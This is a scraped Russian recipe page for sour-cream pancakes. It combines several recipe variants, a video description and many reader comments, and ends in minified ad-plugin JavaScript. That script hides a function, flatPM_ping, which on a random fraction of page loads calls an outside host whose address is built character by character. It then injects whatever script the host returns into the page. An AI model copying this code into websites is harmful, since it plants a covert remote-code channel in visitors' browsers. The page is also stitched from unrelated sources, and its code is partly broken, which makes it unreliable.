Оладьи на сметане

Быстрые оладьи на сметане

Не готовите на завтрак оладьи, потому что сложно, долго, и проще бутербродик сделать? Да ну! Вот вам проверенный и сногсшибательный рецепт от нашей тети Светы из Волгограда. Рецепт был бережно записан, и теперь я расскажу вам его с пошаговыми фотографиями, чтобы оладьи получились абсолютно у всех! Готовить очень просто, а в результате — пышные, воздушные оладьи, к которым можно подать и варенье, и йогурт, и сезонные ягоды.

Автор публикации

Олеся Фисенко

Олеся Фисенко

Автор и основатель проекта «Nehudeem.ru» — кулинарного портала о простой и вкусной еде. С помощью сайта объединяет всех любителей домашней еды. Вместе с другими фуд-блогерами делится вкусными рецептами с подробным пошаговым описанием. Любит готовить и воплощает свои кулинарные знания в рецептах. Каждый день старается сделать этот проект еще удобнее и интереснее. Мама Ани и Кирилла.

Эти оладьи можно назвать и панкейками, поскольку, они готовятся с минимальным количеством масла. Сметану можно заменить йогуртом без добавок.

В миску выложить 300 гр. сметаны (12 столовых ложек), добавить щепотку соли, столовую ложку сахара и яйцо.

Чайную ложку соды без горки залить лимонным соком и тщательно размешать. Добавить к сметане, влить столовую ложку масла и размешать венчиком или вилкой.

Просеять в миску 160 гр. муки и смешать до однородного состояния.

Всё! Можно приступать к приготовлению.

Включить средний огонь, сковороду перед приготовлением первых оладий смазать тонким слоем растительного масла.

Ложкой выложить тесто на расстоянии друг от друга, форму будущих оладий можно подправить той же ложкой. Для тонких оладий будет достаточно 1,5 столовых ложек, если хотите пышнее – можно выкладывать по 2-3 столовые ложки теста для одной оладушки.

Готовить около двух минут до румяного цвета, пока на поверхности теста не начнут лопаться пузыри.

Аккуратно перевернуть оладьи с помощью лопатки, уменьшить огонь и готовить еще 1-2 минуты на второй стороне.

Так приготовить всю партию (масла больше добавлять не нужно!).

Быстрые оладьи на сметане готовы!

Быстрые оладьи на сметане

Не готовите на завтрак оладьи, потому что сложно, долго, и проще бутербродик сделать? Да ну! Вот вам проверенный и сногсшибательный рецепт от нашей тети Светы из Волгограда. Рецепт был бережно записан, и теперь я расскажу вам его с пошаговыми фотографиями, чтобы оладьи получились абсолютно у всех! Готовить очень просто, а в результате — пышные, воздушные оладьи, к которым можно подать и варенье, и йогурт, и сезонные ягоды.

Автор публикации

Олеся Фисенко

Ингредиенты

  • 300 гр. сметана 15%
  • 1 ст.л. сахар
  • 1/6 ч.л. соль
  • 1 шт. яйцо
  • 1,5 ст.л. масло растительное
  • 1 ч.л. сода
  • 1 ч.л. лимонный сок
  • 160 гр. мука пшеничная

Способ приготовления

Эти оладьи можно назвать и панкейками, поскольку, они готовятся с минимальным количеством масла. Сметану можно заменить йогуртом без добавок.

В миску выложить 300 гр. сметаны (12 столовых ложек), добавить щепотку соли, столовую ложку сахара и яйцо.

Чайную ложку соды без горки залить лимонным соком и тщательно размешать. Добавить к сметане, влить столовую ложку масла и размешать венчиком или вилкой.

Просеять в миску 160 гр. муки и смешать до однородного состояния.

Всё! Можно приступать к приготовлению.

Включить средний огонь, сковороду перед приготовлением первых оладий смазать тонким слоем растительного масла.

Ложкой выложить тесто на расстоянии друг от друга, форму будущих оладий можно подправить той же ложкой. Для тонких оладий будет достаточно 1,5 столовых ложек, если хотите пышнее – можно выкладывать по 2-3 столовые ложки теста для одной оладушки.

Готовить около двух минут до румяного цвета, пока на поверхности теста не начнут лопаться пузыри.

Аккуратно перевернуть оладьи с помощью лопатки, уменьшить огонь и готовить еще 1-2 минуты на второй стороне.

Так приготовить всю партию (масла больше добавлять не нужно!).

Это видео недоступно.

Очередь просмотра

Очередь

  • Удалить все
  • Отключить

ПЫШНЫЕ ОЛАДЬИ на СМЕТАНЕ за 5 минут! Мой РЕЦЕПТ вкусных и нежных ОЛАДУШЕК! / OLADYI SOUR CREAM!

Хотите сохраните это видео?

  • Пожаловаться

Пожаловаться на видео?

Выполните вход, чтобы сообщить о неприемлемом контенте.

Понравилось?

Не понравилось?

Текст видео

ПЫШНЫЕ ОЛАДЬИ НА СМЕТАНЕ! МОЙ РЕЦЕПТ ВКУСНЫХ И НЕЖНЫХ ОЛАДУШЕК!

Сегодня я приготовлю классические пышные и нежные оладьи. Такие оладьи готовятся буквально за 5 минут. Рецепт приготовления очень прост! Эти оладушки настолько вкусные, что порадуют и детей, и взрослых.

мука – 240-260 гр
яйцо – 2 шт
сметана (20-30%) – 100 гр
сахар – 80 гр
соль – шепотка
сода – 1/2 ч. ложки

Мои другие видео:

БЛИНЫ с мясом . КАК ПРИГОТОВИТЬ сочные и вкусные БЛИЧИКИ .
https://youtu.be/AHVVS0gngFg

Домашние БЛИНЫ на молоке . КАК ПРИГОТОВИТЬ тонкие блинчики .
https://youtu.be/ppSO_QKnukY

БЛИНЫ НА КИПЯТКЕ – ТОНКИЕ И НЕЖНЫЕ! РЕЦЕПТ ВКУСНЫХ БЛИНОВ!
https://youtu.be/A2qCNmJ4NHM

СЫРНИКИ ИЗ ТВОРОГА – ОЧЕНЬ ВКУСНЫЕ И НЕЖНЫЕ! ЛЕГКИЙ РЕЦЕПТ!
https://youtu.be/rgIWF1T73nU

ПИРОЖНОЕ “КАРТОШКА” ИЗ ПЕЧЕНЬЯ – ВКУС ДЕТСТВА!
https://youtu.be/bYmdiA-INh4

ДОМАШНЕЕ ОВСЯНОЕ ПЕЧЕНЬЕ! ЛЕГКИЙ РЕЦЕПТ!
https://youtu.be/uXIX_7xdPuQ

ОЧЕНЬ ВКУСНЫЙ ХВОРОСТ – ВОЗДУШНЫЙ И ХРУСТЯЩИЙ!
https://youtu.be/ASOfSFuTBFc

ДОМАШНИЙ ТОРТ НАПОЛЕОН СО СГУЩЕНКОЙ! МОЙ ЛЮБИМЫЙ РЕЦЕПТ!
https://youtu.be/xhdP0lqvkWI

ТОРТ МУРАВЕЙНИК СО СГУЩЕНКОЙ – РЕЦЕПТ ИЗ ДЕТСТВА. ОЧЕНЬ ВКУСНЫЙ ДОМАШНИЙ ТОРТ!
https://youtu.be/MUl0suvY0CY

Для коммерческих запросов: VkysnoDoma@yandex.ru

Немного о себе:
Я обожаю готовить! Самые разные рецепты, всегда вкусные блюда, простые и сложные, любимые и новые, салаты и закуски, супы и горячее, торты и десерты, а также пиццы, бургеры, пирожки и чебуреки, и многое, многое другое вы увидите на моем канале Ольга Молодцова ВКУСНО ДОМА!

LUSH OLADYI SOUR CREAM! MY RECIPE FOR A DELICIOUS AND TENDER MUFFIN!

Today I will prepare the classic lush and delicate pancakes. These pancakes are prepared in just 5 minutes. The recipe is very simple! These pancakes are so delicious that will please both children and adults.

flour-240-260 gr
egg-2 PCs
sour cream (20-30%) – 100 gr
sugar-80 gr
salt-whisper
soda-1/2 teaspoon

My other videos:

PANCAKES ON THE BOILING WATER – FINE AND DELICATE! RECIPE OF YUMMY PANCAKES!
https://youtu.be/A2qCNmJ4NHM

CHEESECAKES FROM COTTAGE CHEESE – VERY TASTY AND TENDER! AN EASY RECIPE!
https://youtu.be/rgIWF1T73nU

CAKE “POTATOES” OF COOKIES – THE TASTE OF CHILDHOOD!
https://youtu.be/bYmdiA-INh4

HOMEMADE OATMEAL COOKIES! AN EASY RECIPE!
https://youtu.be/uXIX_7xdPuQ

A DELICIOUS CRULLER – LIGHT AND CRUNCHY!
https://youtu.be/ASOfSFuTBFc

HOMEMADE NAPOLEON CAKE WITH CONDENSED MILK! MY FAVORITE RECIPE!
https://youtu.be/xhdP0lqvkWI

CAKE ANTHILL WITH CONDENSED MILK – A RECIPE FROM MY CHILDHOOD. DELICIOUS HOMEMADE CAKE!
https://youtu.be/MUl0suvY0CY

For commercial inquiries: VkysnoDoma@yandex.ru

A little about myself:
I love cooking! A variety of recipes, always delicious, simple and complex, favorite and new, salads and snacks, soups and hot, cakes and desserts, as well as pizza, burgers, pies and chebureks, and much, much more you will see on my channel Olga Molodtsova DELICIOUS at HOME!

Пышные оладьи на сметане

Извините за нескромность, но уж очень мне нравятся оладьи, которые я пеку на сметане. Они действительно получаются воздушными, пышными и вкусными. Посмотрите сами.

Необходимые ингредиенты, чтобы приготовить пышные оладьи на сметане:

  • сметана 20% — 300 г
  • яйца — 2 шт.
  • сахар — 3 ст. л.
  • мука — 200 г
  • сода — 1 чайная ложка без верха (можно загасить уксусом)
  • соль, совсем немного, 1/4 ч.л. без верха
  • растительное масло
  1. Яйца разбить, взболтать.
  2. Добавить сметану, соль и сахар, перемешать.
  3. Просеять муку, всыпать в неё соду, добавить в сметану и размешать.
  4. Тесто получится достаточно густым, так и должно быть, тесто не будет стекать с ложки.
  5. Налить в сковородку растительное масло, разогреть и ложкой выкладывать тесто небольшими порциями.
  6. Выпекать оладушки на умеренном огне с двух сторон.
  7. Оладьи на сметане едят с медом, вареньем или сметанкой.
  8. Приятного аппетита!

За нескромность не нужно извиняться!
Действительно, оладьи на сметане получаются у Вас очень пышными и воздушными)
Я, как ни стараюсь, не могу достичь таких же результатов…Видимо, оладьи — это не моё…
Попробую ещё разок по Вашему рецепту)

Сегодня готовила по Вашему рецепту!
Все получилось. Я в восторге. -)

Я рада, что оладьи по этому рецепту получаются у всех, значит соотношение ингредиентов идеальное.

Спасибо за рецепт очень вкусно получилось

У меня все получилось с первого раза )) даже угостила своих соседей и им понравилось спасибо всем с уважение Наталья .

Вообще бомба. Они кругленькие.

Чтобы оладьи были пышными их надо выращивать ложкой, аккуратно .Если вымешивать венчиком или блендером они не поднииуться

Да, Мария, ваше замечание очень важное! Оладьи вымешивают ложкой и аккуратно.
Я даже блины вымешиваю всегда вручную. Пробовала миксером — не понравилось, получаются более плотными и соответственно резиновыми.

Я даже не знаю есть в этом какой-то секрет или нет. Просто оладьи всегда и сразу у меня такими получались и я не видела в этом ничего особенного пока сестра не сказала о том, что у меня всегда очень вкусные оладьи, а у неё такие не получаются. Я сделала вывод, что вкус и объём зависит только от наличия сметаны, все остальные ингредиенты обычные.

Отличные оладьи, пышные, воздушные, очень вкусные, спасибо. Вот только закончились быстро. Моим мужчинам, сыну и мужу очень понравились.

Спасибо, Елена, за отзыв, На сметане оладьи всегда получаются просто объедение!

Очень вкусные оладьи,Галине спасибо за рецепт,очень быстро их можно приготовить,в выходные на завтрак самое то!Только я брала 400 гр 15% сметаны,ещё раз спасибо,теперь буду готовить только по вашему рецепту!

Спасибо, Олеся, за оценку рецепта. Если вы увеличили количество муки — другие ингредиенты тоже увеличили? Если нет, то не получились ли оладьи слишком плотные?

Здравствуйте Галина,я увеличила сметану,у вас в рецепте 300гр,а я взяла большую 400 гр банку,все остальное по рецепту.

Понятно, рада, что Вам понравилось.

Спасибо Вам! У меня первый раз получились пышные, пропеченные внутри оладьи! Я совершала уже попыток 20, наверное. На молоке, на кефире, на сметане и не получалось! А тут пеку и радуюсь!

Приятно читать такой отзыв, спасибо Светлана. Прочитала повторно рецепт оладий, подумала может надо как-то подробнее расписать и фотки вставить?, а с другой стороны и так всё понятно и просто, и я рада, что вкусно получается у всех.

Огромное вам спасибо за очень вкусный простой рецепт. Оладьи получились пышными, рассыпчатыми, как у бабушки.Немного души и любви и все очень вкусно!

Крутой рецепт! Оладьи идеальные вышли. С вареньем и медом супер!

Замечательно, Ника!
Если я готовлю оладьи по этому рецепту, всегда 100% результат, здесь «блин комом» не бывает.

Напрасно вы извиняетесь за нескромность, рецепт, действительно, работает) и оладьи получаются идеальными с первого раза. Я искала такой идеальный рецепт и нашла его у Вас, спасибо.

Спасибо, Naomi, посмотрите может быть ещё что-нибудь понравится на сайте. Все рецепты приготовлены самостоятельно, я очень люблю Наполеон, но делать его конечно долго.

Спасибо большое, в первый раз у меня оладьи получились пышными, вкусными, и не опали! Отличный рецепт!

Спасибо, Марина, за отзыв и оценку рецепта, я рада, что вам понравилось.

200 гр муки это не много всего на 300 сметаны??

Если сомневаетесь, возьмите меньше муки, оладушки всё-равно получатся вкусными, может быть не такие пышные будут.

200 гр муки это больше чем стандартный стакан

Инга, я делаю именно в этих пропорциях, тесто получается не жидкое, а что-то похожее на густую сметану. Здесь ведь ещё яйца и сахар, они тоже разжижают тесто. Судя по комментариям к рецепту у всех получилось, надеюсь, что комментарии были от души написаны, иначе какой смысл писать?

спасибо. УРА! теперь и я умею печь ПЫШНЫЕ оладушки))) спасибо.

Правда. У вас получилось. Я рада, спасибо за отзыв.

Готовлю оладьи теперь только по вашему рецепту. Очень вкусные, спасибо! PS А до вашего рецетпа у меня каждый раз была лотерея: получатся или нет).

Спасибо,, Вика, очень приятно, что рецепт понравился.

Спасибо за рецепт,все получилось. Очень вкусно!

Люблю простенькие рецепты, так что на обед деткам и «скуховарю», займет минимально времени вижу. Очень благодарна!

Красота и вкуснятина, рецепт простой, а результат удивителен!

Спасибо, вкусно-вкусно, по настоящему.

и правда очень вкусные получились

Первый раз получились оладьи у меня. Первый раз! Спасибо за рецепт что поделились

Спасибо и вам большое, Лина.

Это только кажется, что сырники и оладьи сделать проще простого. Я столько продуктов перевела))
И вот наконец-то. ;-)))

Лина, этот рецепт получился как-то сам собой опытным путём, то есть нигде не читала, не смотрела, добавляла то, что казалось нужным, как говорят по наитию.
И вот на днях решила сделать из домашней сметаны, учитывая, что она густая добавила меньше муки и у меня не получились мои пышные оладушки, а что-то похожее на рассыпчатое печенье.
Это я к тому, что наверное, всё имеет значение и количество и качество. И если какое блюдо не получилось, то возможно дело не в рецепте, а мы сами в чём-то отошли от рецепта.
Хотя я редко придерживаюсь норматива, но вот точно знаю, что пышные оладьи и наполеон — шаг влево, шаг вправо — и всё…. не будет праздника.

Спасибо за рецепт. Уже не единожды пекла. И на сметане, и на сметане+ кефир, и на кефире, и с пшеничной мукой, и пшеничная+ амарантовая, и пшеничная+ гречневая. Результат отличный. Только сахара в половину меньше кладу.

Мы сладкоежки, любим послаще. Правда у сахара отрицательный эффект, чем больше сахара, тем больше вероятность, что блины, оладьи пригорят.

Спасибо за рецепт.Получились вкусные пышные оладушки.
P.S Выкладывала тесто на сковороду по одной чайной ложке,чтобы быстрее выпекались и не раздувались оладушки,

Рецепт обалденный, действительно получились пышные оладьи и очень вкусные, я тоже люблю когда сахара побольше.

Пышные оладьи на сметане -отличный рецепт. Очень вкусно, понравилось всей семье.

Невероятный рецепт, думала не получится, а оно получилось, спасибо за такой полезный рецепт ❤

Спасибо, вам хозяюшки, за отзыв. Приятно, что вы приготовили оладьи по рецепту и нашли время написать своё мнение о нём — с-п-а-с-и-б-о.
Для меня это очень важно.

Пышные оладьи на сметане: 4 варианта приготовления

Оладьи на сметане предпочитают готовить многие хозяюшки, поскольку они получаются невероятно вкусными, пышными и нежными Время готовки: 45 мин.;

  • Порции: 5;
  • Ккал: 236,8;
  • Белки / Жиры / Углеводы: 6 г / 10,4 г / 30,4 г.

Во многих семьях оладушки стали традиционным завтраком. И это неудивительно, ведь это блюдо готовится быстро, всегда получается вкусным и заряжает энергией на весь день! Существует множество вариаций приготовления этого лакомства, которые придутся по нраву как любителям классического вкуса, так и сладкоежкам.

    • Ингредиенты
    • Традиционные оладьи на сметане
    • Готовим оладьи на сметане: рецепт без яиц
    • Тушеные оладушки на сметане
    • Дрожжевые оладьи на сметане
    • Рецепт оладий на сметане (видео)
    • Оладьи на сметане: рецепт пошагово (фото)

Ингредиенты

  1. Сметана 20 % – 100 мл;
  2. Яйца куриные, средние – 2 штуки;
  3. Мука пшенич. высш. сорта –100 г;
  4. Соль – 1/2 чайной ложки;
  5. Сахар белый-песок – 60 г;
  6. Разрыхлитель – 3 г.
Читать еще:  Клубничный ликер

Традиционные оладьи на сметане

Традиционные оладьи – это пышные, румяные лепешки из сладкого теста, которые так приятно есть с вареньем, запивая чаем или кофе. Такие оладушки надолго сохраняют свой вкус: их приятно есть как теплыми, так и остывшими, а готовить их легко. Если традиционный вкус оладушек на сметане приестся, то классическое тесто можно будет дополнить лимонным соком, цукатами, сухофруктами (приготовление оладушек от этого не поменяется).

Для приготовления традиционных оладий на сметане потребуется минимальное количество продуктов, которые можно приобрести в магазине

Для того чтобы получить вкусные и пышные оладушки необходимо:

  1. Взбить миксером яйца.
  2. Добавить сметану в яичную смесь и тщательно перемешать массу.
  3. Соединить сухие продукты (муку, соль, сахар) с разрыхлителем.
  4. Соединить сухие и мокрые компоненты и миксером перемешать их до однородного состояния.
  5. Жарить лепешки на антипригарной сковороде в течение пары минут на каждую сторону.

Готовим оладьи на сметане: рецепт без яиц

Если вдруг в доме не оказалось яиц, а полакомиться воздушными, сладкими, румяными лепешками хочет все семейство, не нужно отчаиваться и собираться в магазин: на этот случай есть особый рецепт оладушек. Чтобы приготовить тесто на лепешки без добавления яиц, нам понадобится: сметана и кефир (по 120 мл), соль и сода (по одной второй чайной ложке), мука хлебопекарная (150 г), сахар белый-песок (30-60 г).

Готовим оладушки пошагово:

  1. Смешиваем кефир со сметаной, добавляем соду и оставляем массу на 10 минут.
  2. Добавляем соль, сахар, и тщательно вымешиваем массу.
  3. При помощи сита просеиваем муку в массу (так оладушки получатся более пышными).
  4. Замешиваем тесто, чтобы оно стало однородным и эластичным.
  5. Жарим лепешки на медленном огне, под крышкой.

Лакомое блюдо готово! Подавать оладьи можно как тёплыми, с пылу-жару, так и остывшими, с вареньем, медом, маслом.

Тушеные оладушки на сметане

Делать тушеные с медом и сметаной оладушки немного дольше, нежели классические. Но, зато, такие лепешки получаются очень мягкие, сладкие и красивые. Для того, чтобы приготовить блюдо нам понадобятся: по стакану кефира и муки, половина стакана сметаны, 100 грамм меда, 5 грамм разрыхлителя, щепотка соли, половина пакетика ванилина, 3 грамма соды, сахар (40 г).

Делаем оладушки:

  1. Смешайте кефир и сахар в глубокой емкости.
  2. Добавьте в сладкую кефирную массу соль, разрыхлитель и соду.
  3. Порционно всыпайте в массу муку, размешивая ее ложкой (тесто должно стать густым, но не крутым).
  4. Выложите оладушки ложкой на заранее смазанную растительным маслом и разогретую сковороду, и жарьте лепешки с каждой стороны до золотистой корочки.
  5. Выложите готовые оладьи на бумажное полотенце.
  6. На дно эмалированной кастрюли выложите слой сметаны (несколько столовых ложек).
  7. Поверх сметаны выложите оладушки и покройте их медом.
  8. Повторите слои для оставшихся оладий.
  9. Кастрюлю поставьте на средний огонь и дайте массе вскипеть.
  10. Убавьте огонь и томите блюдо под крышкой на протяжении 20 минут.

Вкусное кулинарное изделие для всей семьи готово! Приятного аппетита!

Дрожжевые оладьи на сметане

Дрожжевые оладьи получаются невероятно пышными и нежными. Кроме того, такие оладушки можно сделать в любое время, ведь практически все ингредиенты для этого всегда имеются в хозяйстве. Поэтому, именно рецепт оладий на дрожжах так нравится большинству хозяек. Для того, чтобы испечь дрожжевые оладьи нам понадобятся: сухие дрожжи и сахар (по 5 г), стакан муки, молоко и сметана (по 100 мл каждого продукта).

Дополнительно в тесто можно добавить дрожжи, чтобы оладушки получились пышными

Готовим оладьи пошагово:

  1. В заранее подогретом молоке (не до кипения) растворяем дрожжи и муку (3 г), оставляем смесь на 20 минут.
  2. После того, как опара подошла, добавляем в нее муку и сметану.
  3. Тщательно вымешиваем тесто миксером до однородности.
  4. Выкладываем тесто на разогретую антипригарную сковороду, смазанную маслом и жарим лепешки с каждой стороны до красивой, золотистой корочки.

Выкладывать оладушки со сковородки лучше на бумажное полотенце или салфетки, которые впитают излишки масла.

Готовить оладьи со сметаной можно не только, комбинируя ее с молоком, но и с кефиром, простоквашей, йогуртом. Интересный вкус выйдет, если добавить к традиционному тесту майонез (100 г): особо хорошо такое сочетание будет с сыром.

Рецепт оладий на сметане (видео)

Оладушки на сметане – это сытный и вкусный завтрак, сладкое лакомство к чаю. Используйте традиционные, простые рецепты оладушек или удивляйте родных новыми, необычными сочетаниями: в любом случае блюдо получится невероятно вкусным и быстро станет одним из любимых у всего семейства!

Оладьи на сметане: рецепт пошагово (фото)

В заранее подготовленную емкость вливаем сметану, добавляем яйца и сахар по вкусу

Обязательно добавляем в емкость просеянную муку

По консистенции готовое тесто должно напоминать густую сметану

Разогреваем сковороду с подсолнечным маслом и аккуратно выкладываем оладьи на поверхность. Прожариваем оладушки с обеих сторон до румяного цвета

Готовые и пышные оладьи готовы. Приятного аппетита!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};